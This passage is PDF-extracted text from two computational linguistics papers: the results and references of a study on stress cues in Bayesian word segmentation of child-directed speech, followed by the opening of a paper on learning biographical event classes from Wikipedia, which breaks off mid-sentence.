experiments. The phonemicized version is pro- duced by replacing each orthographic word in the transcript with the first pronunciation given by the dictionary. CMUDict also annotates lexical stress, and we use this information to add stress cues to the corpus. We only code primary lexical stresses in the input, ignoring secondary stresses in line with ex- perimental work that indicates that human listeners are capable of reliably distinguishing primary and secondary stress (Mattys, 2000). Due to the very low frequency of words with 3 or more syllables in these corpora, this choice has very little effect on the number of stress cues available in the input. Our ver- sion of the Korman corpus contains, in total, 11413 utterances. Unlike Christiansen et al. (1998), Yang (2004), and Doyle and Levy (2013), we follow Lig- nos and Yang (2010) in making the more realistic as- sumption that the 94 mono-syllabic function words listed by Selkirk (1984) never surface with lexical stress. As function words account for roughly 50% of the tokens but only roughly 5% of the types in our corpora, this means that the type and token distribu- tion of stress patterns differs dramatically in all our corpora, as can be seen from Table 2. We also added stress information to the Brent- Bernstein-Ratner corpus (Bernstein-Ratner, 1987; Brent, 1999), following the procedure just out- lined. This corpus is a de-facto standard for evaluat- 4http://svn.code.sf.net/p/cmusphinx/ code/trunk/cmudict/cmudict.0.7a 97 Pattern brent korman alex Tok Typ Tok Typ Tok Typ W+ .48 .07 .47 .08 .44 .05 SW∗ .49 .86 .49 .86 .52 .87 WSW∗ .03 .07 .03 .06 .04 .07 Other .00 .00 .00 .00 .00 .00 Table 2: Relative frequencies for stress patterns for the corpora used in our study. X∗ stands for 0 or more, X+ for one or more repetitions of X, and S for a stressed and W for an unstressed syllable. Note the stark asymmetry between type and token frequencies for unstressed words. Up to two-decimal places, patterns other than the ones given have relative frequency 0.00 (frequencies might not sum to 1 as an artefact of rounding to 2 decimal places). ing models of Bayesian word segmentation (Brent, 1999; Goldwater, 2007; Goldwater et al., 2009; Johnson and Goldwater, 2009), comprising in total 9790 utterances. As our third corpus, we use the Alex portion of the Providence corpus (Demuth et al., 2006; Börschinger et al., 2012). A major benefit of the Providence corpus is that the video-recordings from which the transcripts were produced are available through CHILDES alongside the transcripts. This will allow future work to rely on even more realis- tic stress cues that can be derived directly from the acoustic signal. While beyond the scope of this pa- per, we believe choosing a corpus that makes richer information available will be important for future work on stress (and other acoustic) cues. Another major benefit of the Alex corpus is that it provides longitudinal data for a single infant, rather than be- ing a concatenation of transcripts collected from multiple children, such as the Korman and the Brent- Bernstein-Ratner corpus. In total, the Alex corpus comprises 17948 utterances. Note that despite the differences in age of the in- fants and overall make-up of the corpora, the dis- tribution of stress patterns across the corpora is roughly the same, as shown by Table 2 for the first 10,000 utterances of each of the corpora. This sug- gests that the distribution of stress patterns both at a token and type level is a robust property of English child-directed speech. 4.2 Evaluation procedure The aim of our experiments is to understand the contribution of stress cues to the Bayesian word segmentation models described in Section 3. To get an idea of how input size interacts with this, we look at prefixes of the corpora with increasing sizes (100, 200, 500, 1000, 2000, 5000, and 10,000 utterances). In addition, we are interested in under- standing what kind of stress pattern preferences our models acquire. For this, we also collect samples of the probabilities assigned to the different expansions of rule (18), allowing us to examine this directly. The standard evaluation of segmentation models in- volves having them segment their input in an un- supervised manner and evaluating performance on how well they segmented that input. We addition- ally evaluate the models on a test set for each cor- pus. Use of a separate test set has previously been suggested as a means of testing how well the knowl- edge a learner acquired generalizes to novel utter- ances (Pearl et al., 2011), and is required for the kind of comparison across different sizes of input we are interested in to determine whether there the role of stress cues interacts with the input size. We create the test-sets by taking the final 1000 ut- terances for each corpus. These 1000 utterances will be segmented by the model after it has performed inference on its input, without making any further changes to the lexicon that the model has induced. In other words, the model will have to segment each of the test utterances using only the lexicon (and any additional knowledge about co-occurrences, phono- tactics, and stress) it has acquired from the training portion of the corpus during inference. We measure segmentation performance using the standard metric of token f-score (Brent, 1999) which is the harmonic mean of token precision and recall. Token f-score provides an overall impression of how accurate individual word tokens were identified. To illustrate, if the gold segmentation is “the dog”, the segmentation “th e dog” has a token precision of 1 3 (one out of three predicted words is correct); a token recall of 1 2 (one of the two gold words was correctly identified); and a token f-score of 0.4. 4.3 Inference For inference, we closely follow Johnson and Gold- water (2009): we put vague priors on all the hyper- 98 p s usc alex korman brent train test train test train test .81 .81 .85 .83 .82 .82 • .85 .84 .86 .84 .86 .86 • .86 .87 .87 .86 .86 .87 • • .88 .88 .88 .87 .87 .87 • • .87 .88 .87 .88 .86 .87 • • • .88 .88 .88 .87 .87 .88 Table 3: Token f-scores on both train and test portions for all three corpora when inference is performed over the full corpus. Note that the benefit of stress is clearer when evaluating on the test set, and that overall, perfor- mance of the different models is comparable across all three corpora. Models are coded according to the key in Table 1. parameters of our models and run 4 chains for 1000 iterations, collecting 20 samples from each chain with a lag of 10 iterations between each sample af- ter a burn-in of 800 iterations, using both batch- initialization and table-label resampling to ensure good convergence of the sampler. We construct a single segmentation from the posterior samples us- ing their minimum Bayes risk decoding, providing a single score for each condition. 4.4 Experimental conditions Each of our six models is evaluated on inputs of in- creasing size, starting at 100 and ending at 10,000 utterances, allowing us to investigate both how per- formance and “knowledge” of the learner varies as a function of input size. For completeness, we also report the “standard” evaluation, i.e. performance of our models on all corpora when trained on the entire input in Table 3. We will focus our discussion on the results obtained on the Alex corpus, which are de- picted in Figure 4, where the input size is depicted on the x-axis, and the segmentation f-score for the test-set on the y-axis. 5 Discussion We find a clear improvement for the stress-models over both the colloc3-nophon and the colloc3-phon models. As can be seen in Table 3, the overall trend is the same for all three corpora, both when evaluating on the input and the separate test-set.5 5We performed Wilcox rank sum tests on the individual scores of the 4 independent chains for each model on the full training data sets and found that the stress-models were always Note how the relative gain for stress is roughly 1% higher when evaluating on the test-set; this might have to do with Jusczyk (1997)’s observa- tion that the advantage of stress “might be more evident for relatively unexpected or unfamiliarized strings” (Jusczyk, 1997). A closer look at Figure 4 indicates further interesting differences between the colloc3-nophon and the colloc3-phon models that only become evident when considering different in- put sizes. 5.1 Stress cues without phonotactics For the colloc3-nophon models, we observe a rel- atively stable improvement by adding stress cues of 6-7%, irrespective of input size and whether or not the Unique Stress Constraint (USC) is assumed. The sole exception to this occurs when the learner only gets to see 100 utterances: in this case, the colloc-nophon-stress model only shows a 3% im- provement, whereas the colloc3-nophon-stress-usc model obtains a boost of roughly 8%. Noticeable consistent differences between the colloc3-nophon- stress and colloc3-nophon-stress-usc model, how- ever, all but disappear starting from around 500 ut- terances. This is somewhat surprising, considering that it is the USC that was argued by Yang (2004) to be key for taking advantage of stress.6 We take this behaviour to indicate that even with as little evidence as 200 to 500 utterances, a Bayesian ideal learner can effectively infer that something like the USC is true of English. This also becomes clear when examining how the learn- ers’ preferences for different stress patterns evolve over time, as we do in Section 5.3 below. 5.2 Stress cues and phonotactics Overall, the models including phonotactic cues per- form better than those that do not rely on phono- tactics. However, the overall gain contributed by stress to the colloc3-phon baseline is smaller, al- significantly more accurate (p < 0.05) than the baseline models except when evaluating on the training data for the Korman and Brent corpora. 6On data in which function words are marked for stress (as in Yang (2004) and Doyle and Levy (2013)), the USC yields ex- tremely high scores across all models, simply because roughly every second word is a function word. Given that this assump- tion is extremely unnatural, we do not take this as an argument for the USC. 99 0.65 0.70 0.75 0.80 0.85 100 200 500 1000 2000 5000 10000 number of input utterances se g m e n ta tio n f − sc o re colloc3−nophon colloc3−phon colloc3−nophon−stress colloc3−phon−stress colloc3−nophon−stress−usc colloc3−phon−stress−usc Figure 4: Segmentation performance of the different models, across different input sizes and as evaluated on the test-set for the Alex corpus. The no-stress baselines are given in red, the stress-models without the Unique Stress Constraint (USC) in green and the ones including the USC in black. Solid lines indicate models that use, dashed lines models that do not use phonotactics. Refer to the text for discussion. though this seems to depend on the size of the input. While phonotactics by itself appears to be a pow- erful cue, yielding a noticeable 4-5% improvement over the colloc3-nophon baseline, the learner seems to require at least around 500 utterances before the colloc3-phon model becomes clearly more accurate than the colloc3-nophon model. In contrast, even for only 100 utterances stress cues by themselves provide a 3% improvement to the colloc3-nophon model, indicating that they can be taken advantage of earlier. While the number of utterances processed by a Bayesian ideal learner is not directly related to developmental stages, this observation is consistent with the psycholinguists’ claim that phonotactics are used by infants for word segmentation after they have begun to use stress for segmentation (Jusczyk et al., 1999a). Turning to the interaction between stress and phonotactics, we see that there is no consistent ad- vantage of including the USC in the model. This is, in fact, even clearer than for the colloc3-nophon model where at least for small inputs of size 100, the USC added almost 5% in performance. For the colloc3-phon models, we only observe a 1-2% im- provement by adding the USC up until 500 utter- ances. This further strengthens the point that even in the absence of such an innate constraint, a statisti- cal learner can take advantage of stress cues and, as we show below, actually acquire something like the USC from the input. The 4% difference between the colloc3-phon- stress / colloc3-phon-stress-usc models to the colloc3-phon baseline is smaller than the 7% dif- ference between the colloc3-nophon and colloc3- nophon-stress models. This shows that there is a redundancy between phonotactic and stress cues in large amounts of data, as their joint contribution to the colloc3-nophon baseline is less than the sum of their individual contributions at 10,000 utterances, of 4% (for phonotactics) and 7% (for stress). Unlike for the colloc3-nophon models, we also see a clear impact of input size. In particular, at 100 utterances the addition of stress cues leads to an 8 – 10% improvement, depending on whether or not the USC is assumed, whereas for the colloc3- nophon model we only observed a 3 – 8% improve- ment. This is particularly striking when we con- sider that by themselves, the phonotactic cues only contribute a 1% improvement to the colloc3-nophon baseline when trained on the 100 utterance corpus, 100 indicating a synergistic interaction (rather than re- dundancy) between phonotactics and stress for small inputs. This effect disappears starting from around 1000 utterances; for inputs of size 1000 and larger, the net-gain of stress drops from roughly 10% to a 3–4% improvement. That is, while we did not notice any relationship between input size and impact of stress cues for the colloc3-nophon model, we do see such an interaction for the combination of phonotac- tics and stress cues which, taken together, lead to a larger relative gain in performance on smaller inputs than on large ones. 5.3 Acquisition of stress patterns In addition to acquiring a lexicon, the Bayesian learner acquires knowledge about the possible stress patterns of English words. The fact that this knowl- edge is explicitly represented through the PCFG rules and their probabilities that define the lexi- cal generator allows us to study the generalisations about stress the model actually acquires. While Doyle and Levy (2013) suggest carrying out such an analysis, they restrict themselves to estimating the fraction of stress patterns in the segmented out- put. As shown in Table 2, however, the type and token distributions of stress patterns can differ sub- stantially. We therefore investigate the stress pref- erences acquired by our learner by examining the probabilities assigned to the different expansions of rule (18), aggregating the probabilities of the indi- vidual rules into patterns. For example, the rules Word → SSyll ( USyll ){0,3} correspond to the pattern “Stress on the first syllable”, whereas the rules Word → USyll{1,4} correspond to the pat- tern “Unstressed word”. By computing the respec- tive probabilities, we get the overall probability as- signed by a learner to the pattern. Figure 5 provides this information for several dif- ferent rule patterns. Additionally, these plots in- clude the empirical type (red dotted) and token pro- portions (red double-dashed) for the input corpus. Note how for the two major patterns, all models suc- cessfully track the type, rather than the token fre- quency, correctly developing a preference for stress- initial over unstressed words, despite the compa- rable token frequency of these two patterns. This is compatible with a recent proposal by Thiessen and Saffran (2007), who argue that infants infer the stress pattern over their lexicon. For a Bayesian model such as ours or Goldwater et al. (2009)’s, there is no need to pre-specify that the distribution ought to be learned over types rather than tokens, as the models automatically interpolate between type and token statistics according to the properties of their input (Goldwater et al., 2006). In addition, a Bayesian framework provides a simple answer to the question of how a learner might identify the role of stress in its language without already having ac- quired at least some words. By combining differ- ent kinds of cues, e.g. distributional, phonotactic and prosodic, in a principled manner a Bayesian learner can jointly segment its input and learn the appropriate role of each cue, without having to pre- specify specific preferences that might differ across languages. The iambic rule pattern that puts stress on the sec- ond syllable is much more infrequent on a token level. All models track this low token frequency, underestimating the type frequency of this pattern by a fair amount. This suggests that learning this pattern correctly requires considerably more input than for the other patterns. Indeed, the iambic pat- tern is known to pose problems for infants when they start using stress as an effective cue. It is only from roughly 10 months of age that infants successfully segment iambic words (Jusczyk et al., 1999b). Not surprisingly, the USC doesn’t aid in learning about this pattern because it is completely silent on where stress might fall (and does not noticeably improve segmentation performance to begin with). Finally, we can also investigate whether the models that lack the USC nevertheless learn that words contain at most one lexically stressed syl- lable. The bottom-right graph in Figure 5 plots the probability assigned by the models to patterns that violate the USC. This includes, for example, the rules Word → SyllS SyllS and Word → SyllS SyllU SyllS . Note how the probabilities as- signed to these rules approaches zero, indicating that the learner becomes more certain that there are no words that contain more than one syllable with lex- ical stress. As we argued above, this suggests that a Bayesian learner can acquire the USC from a mod- est amount of data — it will properly infer that the unnatural patterns are simply not supported by the input. To summarize, by examining the internal 101 0.55 0.60 0.65 0.70 0.75 0.80 0.85 100 200 500 1000 2000 5000 10000 P (S tr e ss o n f ir st ) 0.02 0.03 0.04 0.05 0.06 0.07 100 200 500 1000 2000 5000 10000 number of input utterances P (S tr e ss o n s e co n d ) 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0.40 0.45 100 200 500 1000 2000 5000 10000 P (U n st re ss e d w o rd ) 0.05 0.10 100 200 500 1000 2000 5000 10000 number of input utterances P (V io la te s U S C ) colloc3−nophon−stress colloc3−phon−stress colloc3−nophon−stress−usc colloc3−phon−stress−usc Figure 5: Evolution of the knowledge the learner acquires on the Alex corpus. The red dotted line indicates the empirical type distribution of a specific pattern, and the double-dashed line the empirical token distribution. Top-Left: Stress-initial pattern, Top-Right: Unstressed Words, Bottom-Left: Stress-second pattern, Bottom-Right: Patterns that violate the USC. state of the Bayesian learners we can characterise how their knowledge about the stress preferences of their languages develops, rather than merely measur- ing how well they perform word segmentation. We find that the iambic pattern that has been observed to pose problems for infant learners also is harder for the Bayesian learner to acquire, arguably due to its extremely low token-frequency. 6 Conclusion and Future Work We have presented Adaptor Grammar models of word segmentation that are able to take advantage of stress cues and are able to learn from phonemic input. We find that phonotactics and stress interact in interesting ways, and that stress cues makes a sta- ble contribution to existing word segmentation mod- els, improving their performance by 4-6% token f- score. We also find that the USC introduced by Yang (2004) need not be prebuilt into a model but can be acquired by a Bayesian learner from the data. Sim- ilarly, we directly investigate the stress preferences acquired by our models and find that for stress-initial and unstressed words, they track type rather than token frequencies. The rare stress-second pattern seems to require more input to be properly acquired, which is compatible with infant development data. An important goal for future research is to eval- uate segmentation models on typologically different languages and to study the relative usefulness of dif- ferent cues cross-lingually. For example, languages such as French lack lexical stress; it would be inter- esting to know whether in such a case, phonotactic (or other) cues are more important. Relatedly, recent work such as Börschinger et al. (2013) has found that artificially created data often masks the com- plexity exhibited by real speech. This suggests that future work should use data directly derived from the acoustic signal to account for contextual effects, rather than using dictionary look-up or other heuris- tics. In using the Alex corpus, for which good qual- ity audio is available, we have taken a first step in this direction. 102 Acknowledgements This research was supported by the Australian Research Council’s Discovery Projects funding scheme (project numbers DP110102506 and DP110102593). We’d like to thank Professor Dupoux and our other colleagues at the Laboratoire de Sciences Cognitives et Psycholinguistique in Paris for hosting us while this research was per- formed, as well as the Mairie de Paris, the fondation Pierre Gilles de Gennes, the Ecole des Hautes Etudes en Sciences Sociales, the Ecole Normale Supérieure, The Region Ile de France, the European Research Council (ERC-2011-AdG-295810 BOOT- PHON), the Agence Nationale pour la Recherche (ANR-2010-BLAN-1901-1 BOOTLANG, ANR- 10-IDEX-0001-02 and ANR-10-LABX-0087) and the Fondation de France. We’d also like to thank three anonymous reviewers for helpful comments and suggestions. References N. Bernstein-Ratner. 1987. The phonology of parent- child speech. In K. Nelson and A. van Kleeck, editors, Children’s Language, volume 6. Erlbaum, Hillsdale, NJ. Benjamin Börschinger, Katherine Demuth, and Mark Johnson. 2012. Studying the effect of input size for Bayesian word segmentation on the Providence cor- pus. In Proceedings of the 24th International Con- ference on Computational Linguistics (Coling 2012), pages 325–340. Coling 2012 Organizing Committee. Benjamin Börschinger, Mark Johnson, and Katherine De- muth. 2013. A joint model of word segmentation and phonological variation for English word-final /t/- deletion. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Vol- ume 1: Long Papers), pages 1508–1516. Association for Computational Linguistics. M. Brent. 1999. An efficient, probabilistically sound algorithm for segmentation and word discovery. Ma- chine Learning, 34:71–105. M. Christiansen and S. Curtin. 1999. The power of sta- tistical learning: No need for algebraic rules. In Pro- ceedings of the 21st Annual Conference of the Cogni- tive Science Society. Morten H Christiansen, Joseph Allen, and Mark S Sei- denberg. 1998. Learning to segment speech using multiple cues: A connectionist model. Language and Cognitive Processes, 13(2-3):221–268. Suzanne Curtin, Toben H Mintz, and Morten H Chris- tiansen. 2005. Stress changes the representational landscape: Evidence from word segmentation. Cog- nition, 96(3):233–262. Anne Cutler and David M Carter. 1987. The predomi- nance of strong initial syllables in the English vocabu- lary. Computer Speech and Language, 2(3):133–142. Anne Cutler, Jacques Mehler, Dennis Norris, and Juan Segui. 1986. The syllable’s differing role in the seg- mentation of French and English. Journal of Memory and Language, 25(4):385 – 400. Anne Cutler. 2005. Lexical stress. In David B. Pisoni and Robert E. Remez, editors, The Handbook of Speech Perception, pages 264–289. Blackwell Pub- lishing. K. Demuth, J. Culbertson, and J. Alter. 2006. Word- minimality, epenthesis, and coda licensing in the ac- quisition of English. Language and Speech, 49:137– 174. Gabriel Doyle and Roger Levy. 2013. Combining mul- tiple information types in Bayesian word segmenta- tion. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Technolo- gies, pages 117–126. Association for Computational Linguistics. Victoria Fromkin, editor. 2001. Linguistics: An Intro- duction to Linguistic Theory. Blackwell, Oxford, UK. Sharon Goldwater, Tom Griffiths, and Mark John- son. 2006. Interpolating between types and tokens by estimating power-law generators. In Y. Weiss, B. Schölkopf, and J. Platt, editors, Advances in Neural Information Processing Systems 18, pages 459–466. MIT Press. Sharon Goldwater, Thomas L. Griffiths, and Mark John- son. 2009. A Bayesian framework for word segmen- tation: Exploring the effects of context. Cognition, 112(1):21–54. Sharon Goldwater. 2007. Nonparametric Bayesian Mod- els of Lexical Acquisition. Ph.D. thesis, Brown Uni- versity. Mark Johnson and Katherine Demuth. 2010. Unsu- pervised phonemic Chinese word segmentation using Adaptor Grammars. In Proceedings of the 23rd In- ternational Conference on Computational Linguistics (Coling 2010), pages 528–536. Coling 2010 Organiz- ing Committee. Mark Johnson and Sharon Goldwater. 2009. Improving nonparameteric Bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. In Proceedings of Human Language Technolo- gies: The 2009 Annual Conference of the North Amer- ican Chapter of the Association for Computational 103 Linguistics, pages 317–325. Association for Compu- tational Linguistics. Mark Johnson, Thomas L. Griffiths, and Sharon Goldwa- ter. 2007. Adaptor Grammars: A framework for spec- ifying compositional nonparametric Bayesian models. In B. Schölkopf, J. Platt, and T. Hoffman, editors, Ad- vances in Neural Information Processing Systems 19, pages 641–648. MIT Press, Cambridge, MA. Mark Johnson. 2008a. Unsupervised word segmentation for Sesotho using Adaptor Grammars. In Proceedings of the Tenth Meeting of ACL Special Interest Group on Computational Morphology and Phonology, pages 20–27. Association for Computational Linguistics. Mark Johnson. 2008b. Using Adaptor Grammars to identify synergies in the unsupervised acquisition of linguistic structure. In Proceedings of the 46th Annual Meeting of the Association of Computational Linguis- tics, pages 398–406. Association for Computational Linguistics. Peter W Jusczyk, Anne Cutler, and Nancy J Redanz. 1993. Infants’ preference for the predominant stress patterns of English words. Child Development, 64(3):675–687. Peter W. Jusczyk, E. A. Hohne, and A. Bauman. 1999a. Infants’ sensitivity to allophonic cues for word seg- mentation. Perception and Psychophysics, 61:1465– 1476. Peter W. Jusczyk, Derek M. Houston, and Mary New- some. 1999b. The beginnings of word segmentation in English-learning infants. Cognitive Psychology, 39(3- 4):159–207. Peter Jusczyk. 1997. The discovery of spoken language. MIT Press, Cambridge, MA. Myron Korman. 1984. Adaptive aspects of maternal vo- calizations in differing contexts at ten weeks. First Language, 5:44–45. Constantine Lignos and Charles Yang. 2010. Reces- sion segmentation: simpler online word segmentation using limited resources. In Proceedings of the Four- teenth Conference on Computational Natural Lan- guage Learning, pages 88–97. Association for Com- putational Linguistics. Constantine Lignos. 2011. Modeling infant word seg- mentation. In Proceedings of the Fifteenth Conference on Computational Natural Language Learning, pages 29–38. Association for Computational Linguistics. Constantine Lignos. 2012. Infant word segmentation: An incremental, integrated model. In Proceedings of the West Coast Conference on Formal Linguistics 30. Brian MacWhinney. 2000. The CHILDES project: Tools for analyzing talk: Volume I: Transcription format and programs, volume II: The database. Computational Linguistics, 26(4):657–657. Sven L Mattys and Peter W Jusczyk. 2000. Phonotac- tic cues for segmentation of fluent speech by infants. Cognition, 78(2):91–121. Sven L Mattys. 2000. The perception of primary and secondary stress in English. Perception and Psy- chophysics, 62(2):253–265. Lisa Pearl, Sharon Goldwater, and Mark Steyvers. 2011. Online learning mechanisms for Bayesian models of word segmentation. Research on Language and Com- putation, 8(2):107–132. Elisabeth O. Selkirk. 1984. Phonology and Syntax: The Relation Between Sound and Structure. MIT Press. Erik D Thiessen and Jenny R Saffran. 2003. When cues collide: use of stress and statistical cues to word boundaries by 7-to 9-month-old infants. Developmen- tal Psychology, 39(4):706. Erik D Thiessen and Jenny R Saffran. 2007. Learning to learn: Infants acquisition of stress-based strategies for word segmentation. Language Learning and Develop- ment, 3(1):73–100. Carnegie Mellon University. 2008. The CMU pronounc- ing dictionary, v.0.7a. Charles Yang. 2004. Universal grammar, statistics or both? Trends in Cognitive Sciences, 8(10):451–456. 104 work_643a5sia2bchnksdxl2mqbqyka ---- Unsupervised Discovery of Biographical Structure from Text David Bamman School of Computer Science Carnegie Mellon University Pittsburgh, PA 15213, USA dbamman@cs.cmu.edu Noah A. Smith School of Computer Science Carnegie Mellon University Pittsburgh, PA 15213, USA nasmith@cs.cmu.edu Abstract We present a method for discovering abstract event classes in biographies, based on a prob- abilistic latent-variable model. Taking as in- put timestamped text, we exploit latent corre- lations among events to learn a set of event classes (such as BORN, GRADUATES HIGH SCHOOL, and BECOMES CITIZEN), along with the typical times in a person’s life when those events occur. In a quantitative evalua- tion at the task of predicting a person’s age for a given event, we find that our genera- tive model outperforms a strong linear regres- sion baseline, along with simpler variants of the model that ablate some features. The ab- stract event classes that we learn allow us to perform a large-scale analysis of 242,970 Wikipedia biographies. Though it is known that women are greatly underrepresented on Wikipedia—not only as editors (Wikipedia, 2011) but also as subjects of articles (Reagle and Rhue, 2011)—we find that there is a bias in their characterization as well, with biogra- phies of women containing significantly more emphasis on events of marriage and divorce than biographies of men. 1 Introduction The written text that we interact with on an everyday basis—news articles, emails, social media, books— contains a vast amount of information centered on people: news (including common NLP corpora such as the New York Times and the Wall Street Journal) details the roles of actors in current events, social media (including Twitter and Facebook) documents the actions and attitudes of friends, and books chron- icle the stories of fictional characters and real people alike. This focus on people gives us an abundance of information on how the lives of those portrayed un- fold; for corpora that include historically deep bi- ographical information (such as Wikipedia, book- length biographies and autobiographies, and even newspaper obituaries) this data includes the actors involved in particular historical events and the times and places in which they occur. The life events de- scribed in these texts have natural structure: event classes exhibit correlations with each other (e.g., those who DIVORCE must have been MARRIED), can occur at roughly similar times in the lives of dif- ferent individuals (MARRIAGE is more likely to oc- cur earlier in one’s life than later), and can be bound to historical moments as well (FIGHTS IN WORLD WAR II peaks in the early 1940s). Social scientists have long been interested in the structure of these events in investigating the role that individual agency and larger social forces play in shaping the course of an individual’s life. Life stages marking “transitions to adulthood” (such as LEAVING SCHOOL, ENTERING THE WORKFORCE and MARRIAGE) have important correlates with de- mographic variables (Modell et al., 1976; Hogan and Astone, 1986; Shanahan, 2000); and researchers study the interactional effects that life events have on each other, such as the relationship between di- vorce and pre-marital cohabitation (Lillard et al., 1995; Reinhold, 2010) or having children (Lillard and Waite, 1993). The data on which these studies draw, however, has largely been restricted to categorical surveys and observational data; we present here a latent- variable model that exploits the correlations of event descriptions in text to learn the structure of abstract events, grounded in time, from text alone. While our 363 Transactions of the Association for Computational Linguistics, 2 (2014) 363–376. Action Editor: Jian Su. Submitted 6/2014; Published 10/2014. c©2014 Association for Computational Linguistics. model can be estimated on any set of texts where the birth dates of a set of mentioned entities are known, we illustrate our method on a large-scale dataset of 242,970 biographies extracted from Wikipedia. This paper makes two contributions: first, we present a general unsupervised model for learning life event classes from biographical text, along with the structure that binds them; second, in using this method to learn event classes from Wikipedia, we uncover evidence of systematic bias in the presen- tation of male and female biographies (with biogra- phies of women containing significantly dispropor- tionate emphasis on the personal events of mar- riage and divorce). In addition to these contribu- tions, we also present a range of other analyses that uncovering life events in text can make possible. Data and code to support this work can be found at http://www.ark.cs.cmu.edu/bio/. 2 Data The data for this analysis originates in the January 2, 2014 dump of English-language Wikipedia.1 We extract biographies by identifying all articles with persondata metadata2 in which the DATE OF BIRTH field is known. This results in a set of 927,403 biographies. For each biography, we perform part-of-speech tagging using the Stanford POS tagger (Toutanova et al., 2003) and named entity recognition using the Stanford named entity recognizer (Finkel et al., 2005), cluster all mentions of co-referring proper names (Davis et al., 2003; Elson et al., 2010) and resolve pronominal co-reference (Bamman et al., 2014), aided by gender inference for each entity as the gender corresponding to the maximum number of gendered pronouns (i.e., he and she) mentioned in the article, as also used by Reagle and Rhue (2011). In a random test set of 500 articles, this method of gender inference is overwhelmingly ac- curate, achieving 100% precision with 97.6% recall (12 articles had no pronominal mentions and so gen- der is not assigned). 1http://dumps.wikimedia.org/enwiki/ 20140102/enwiki-20140102-pages-articles. xml.bz2 2“Persondata is a special set of metadata that can and should be added to biographical articles only” (http://en. wikipedia.org/wiki/Wikipedia:Persondata). As further preprocessing, we identify multiword expressions in all texts as maximal sequences of adjective + noun part of speech tags (yielding, for example, New York, United States, early life and high school), as first described in Justeson and Katz (1995). For each biographical article, we then ex- tract all sentences in which the subject of the ar- ticle is mentioned along with a single date and re- tain only the terms in each sentence that are among the most frequent 10,000 unigrams and multiword expressions in all documents, excluding stopwords such as the and all numbers (including dates). An “event” is the bag of these unigrams and multiword expressions extracted from one such sentence, along with a corresponding timestamp measured as the dif- ference between the observed date in the sentence and the date of birth of the entity. Table 1 illustrates the actual form of the data with a sample of extracted sentences from the biography of Frank Lloyd Wright, along with the data as input to the model. In the terminology of the model de- scribed below, each sentence constitutes one “event” in the subject’s life. For the final dataset we retain all biographies where the subject of the article is born after the year 1800 and for which there exist at least 5 events (242,970 people). The complete data consists of 2,313,867 events across these 242,970 people. 3 Model The quantities of interest that we want to learn from the data are: 1.) a broad set of major life events recorded in Wikipedia biographies that people expe- rience at similar stages in their lives (such as BEING BORN, GRADUATING HIGH SCHOOL, SERVING IN THE ARMY, GETTING MARRIED, and so on); 2.) correlations among those life events (e.g., knowing that if an individual WINS A NOBEL PRIZE that they’re more likely to RECEIVE AN HONORARY DOCTORATE); and 3.) an attribution of those classes of events to particular moments in a specific indi- vidual’s life (e.g., John Nash RECEIVED AN HON- ORARY DOCTORATE in 1999). We cast this problem as an unsupervised learning one; given no labeled instances, can we infer these quantities from text alone? One possible alterna- tive approach would be to leverage the categorical 364 Original sentence Data as input to model Terms (w) Time (t) He was admitted to the University of Wisconsin– Madison as a special student in 1886. admitted university wisconsin madison special student 19 Wright first traveled to Japan in 1905, where he bought hundreds of prints. wright first traveled japan bought hundreds prints 38 After Wright’s return to the United States in Octo- ber 1910, Wright persuaded his mother to buy land for him in Spring Green, Wisconsin. wright return united states wright persuaded mother buy land spring green wisconsin 43 This philosophy was best exemplified by his design for Fallingwater (1935), which has been called “the best all-time work of American architecture”. philosophy best design called best all-time work american architecture 68 Already well known during his lifetime, Wright was recognized in 1991 by the American Institute of Architects as “ the greatest American architect of all time.” already well known lifetime wright recognized american institute architects greatest american architect time 124 Table 1: A sample of 5 of the 64 sentences (original and converted) that constitute the data for Frank Lloyd Wright (born 1867). Each event is defined as one such temporally-scoped sentence. information contained in Wikipedia biographies (or its derivatives, such as Freebase; Google, 2014) as a form of supervision (e.g., George Washington is a member of the categories Presidents of the United States and American cartographers, among others). These manual categories, however, are often spo- radically annotated and have a long tail (with most categories appearing very few times); in learning event structure directly from text, we avoid relying on categories’ accuracy and being constrained by a fixed ontology. One advantage of an unsupervised approach is that we eliminate the need to define a pre-determined set of event classes a priori, allow- ing application across a variety of different domains and time periods, such as full-text books from the Internet Archive or Hathi Trust, or historical works like the Oxford Dictionary of National Biography (Matthew and Harrison, 2004). Figure 1a illustrates the graphical form of our hi- erarchical Bayesian model, which articulates the re- lationship between an entity’s set of events (where each event is an observation defined as the bag of terms in text and the difference between the year it was recorded as happening and the birth year), an abstract set of event classes, correlations among those abstract classes, and the distribution of vocab- ulary terms that defines each one. To capture corre- lations among different classes, we place a logistic normal prior on each biography’s distribution over event classes (Blei and Lafferty, 2006a; Blei and Lafferty, 2007; Mimno et al., 2008); unlike a Dirich- let, a logistic normal is able to capture arbitrary cor- relations between elements through the structure of the covariance matrix of its underlying multivariate normal. We take a Bayesian approach to estimating the mean µη and covariance Ση, drawing them from a conjugate Normal-Inverse Wishart prior. The generative story for the model runs as fol- lows: let K be the number of latent event classes, P be the number of biographies, and Ep be the number of events in biography p. • Draw event class means and covariances µη ∈ RK, Ση ∈ RK×K ∼ Normal-Inverse Wishart(µ0,λ, Ψ,ν) • For each event class i ∈{1, . . . ,K}: - Draw event-term distribution φk ∼ Dir(γ) • For each biography p: - Draw ηp ∼N(µη, Ση) - Convert ηp into biography-event proportions βp through the softmax function: βp,i = exp(ηp,i)∑K k=1 exp(ηp,k) - For each event e in biography p: - Draw event class index z ∼ Mult(βp) - Draw timestamp t ∼N(µz,σ2z) - For each token in event e: - Draw term w ∼ Mult(φz) 365 z w t η µη Ση NIW φ γ σ2 µ W E P (a) FULL. z w t η α φ γ σ2 µ W E P (b) –CORRELATION. η ∼ Dir(α) z w η µη Ση NIW φ γ W E P (c) –TIME z w η α φ γ W E P (d) –CORRELATION, –TIME. η ∼ Dir(α) Figure 1: Graphical form of the full model (described in §3) and models with ablations (described in §4). Inference proceeds via stochastic EM: after ini- tializing all variables to random values, we alter- nate between collapsed Gibbs sampling for the la- tent class indicators followed by maximization steps over all other parameters: 1. Sample all z using collapsed Gibbs sampling conditioned on current values for η and all other z. 2. For each biography p, maximize likelihood with respect to ηp via gradient ascent given the current samples of z and priors µη and Ση. 3. Assign MAP estimates of µη and Ση given current values of η and the Normal-Inverse Wishart prior. Update µ and σ2 according to its maximum likelihood estimate given z. We describe the technical details of each step be- low. Sampling z. Given 